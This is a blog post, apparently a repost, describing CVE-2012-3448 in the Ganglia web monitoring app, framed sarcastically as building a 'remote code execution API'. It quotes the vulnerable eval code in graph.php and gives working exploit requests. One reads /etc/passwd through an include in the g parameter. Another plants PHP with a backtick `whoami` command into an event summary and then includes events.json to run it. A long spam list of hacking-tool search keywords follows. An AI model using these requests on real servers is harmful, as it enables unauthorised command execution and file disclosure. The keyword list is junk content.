TIME

NEPAL QATAR BELFAST, UK MALAYSIA DUBAI

Thursday, August 27, 2020

Extending Your Ganglia Install With The Remote Code Execution API

Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -

$graph = isset($_GET["g"])  ?  sanitize ( $_GET["g"] )   : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');


I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -

function sanitize ( $string ) {
  return  escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}


According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'

Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call - 
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'


As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.

Update: This issue has been assigned CVE-2012-3448

Continue reading


  1. Hacker Tools Free
  2. Hacker Tools 2019
  3. Pentest Automation Tools
  4. Hacking Tools Software
  5. Tools For Hacker
  6. Termux Hacking Tools 2019
  7. Pentest Tools Android
  8. Hacker Security Tools
  9. Hacker Tools 2019
  10. Game Hacking
  11. Hak5 Tools
  12. Hacker Tools Apk Download
  13. Pentest Tools Apk
  14. Github Hacking Tools
  15. Pentest Tools Linux
  16. Hack Tools For Mac
  17. Hacking Tools Windows
  18. Hack And Tools
  19. Hacker Tools List
  20. Hacker Security Tools
  21. Hacker Search Tools
  22. Pentest Tools Tcp Port Scanner
  23. Hacking Tools For Mac
  24. Hacking Apps
  25. Underground Hacker Sites
  26. Hak5 Tools
  27. Pentest Tools Windows
  28. Hacker Security Tools
  29. Hacking Tools 2020
  30. Pentest Tools For Ubuntu
  31. Hacker Tools For Pc
  32. Hack Tool Apk No Root
  33. Best Hacking Tools 2019
  34. Hack Tools 2019
  35. Hack Apps
  36. Hack Rom Tools
  37. Hack Tools Online
  38. Pentest Tools Framework
  39. Hacking Tools Online
  40. Install Pentest Tools Ubuntu
  41. How To Hack
  42. Hacking Tools Hardware
  43. Game Hacking
  44. Hacking Tools For Mac
  45. Pentest Tools Alternative
  46. Pentest Tools Nmap
  47. Hack Tools Online
  48. New Hacker Tools
  49. Hacking Tools Free Download
  50. Nsa Hack Tools Download
  51. New Hacker Tools
  52. Hacking Tools Windows 10
  53. Hack Tools Github
  54. Tools 4 Hack
  55. Best Pentesting Tools 2018
  56. Hacking App
  57. Pentest Tools Online
  58. Hacking Tools For Windows 7
  59. Ethical Hacker Tools
  60. Hack Tools 2019
  61. Hacking Tools For Windows 7
  62. Hack Tools For Windows
  63. Pentest Tools Free
  64. Hacker Tools 2020
  65. Best Hacking Tools 2020
  66. Hacking Tools Software
  67. Pentest Tools Website
  68. Install Pentest Tools Ubuntu
  69. Hackrf Tools
  70. Hack Tools Download
  71. Pentest Tools For Ubuntu
  72. Pentest Tools Alternative
  73. Hacker Tools Online
  74. Pentest Tools Review
  75. Pentest Tools Url Fuzzer
  76. Pentest Tools Bluekeep
  77. Hacking Apps
  78. Hack And Tools
  79. Hacking Tools For Windows 7
  80. Hack App
  81. Hack Tools Download
  82. Hack Apps
  83. Hacking Tools For Games
  84. Wifi Hacker Tools For Windows
  85. Best Hacking Tools 2019
  86. World No 1 Hacker Software
  87. Hacker Tools Apk Download
  88. Hacking Tools Hardware
  89. Hackrf Tools
  90. Beginner Hacker Tools
  91. Hak5 Tools
  92. Hacking Tools For Mac
  93. Hacking Tools Windows 10
  94. Android Hack Tools Github
  95. Hacker Tools Apk
  96. Hack Tools
  97. Pentest Tools Nmap
  98. Hacking Apps
  99. Hacker Tools Apk
  100. Hacker Tools For Pc
  101. Pentest Tools Framework
  102. Hacker Tools Free Download
  103. Kik Hack Tools
  104. Pentest Reporting Tools
  105. Termux Hacking Tools 2019
  106. Pentest Tools
  107. Hacker Tools For Ios
  108. Hacker Tools For Windows
  109. Nsa Hack Tools
  110. Hacker Security Tools
  111. Pentest Tools Android
  112. Pentest Tools Review
  113. Hack App
  114. Pentest Tools Free
  115. Hacker Tools
  116. Pentest Tools Subdomain
  117. Hacking Tools Online
  118. Pentest Tools Alternative
  119. Tools 4 Hack
  120. Pentest Tools Port Scanner
  121. Pentest Tools Bluekeep
  122. Hacker Tools List
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)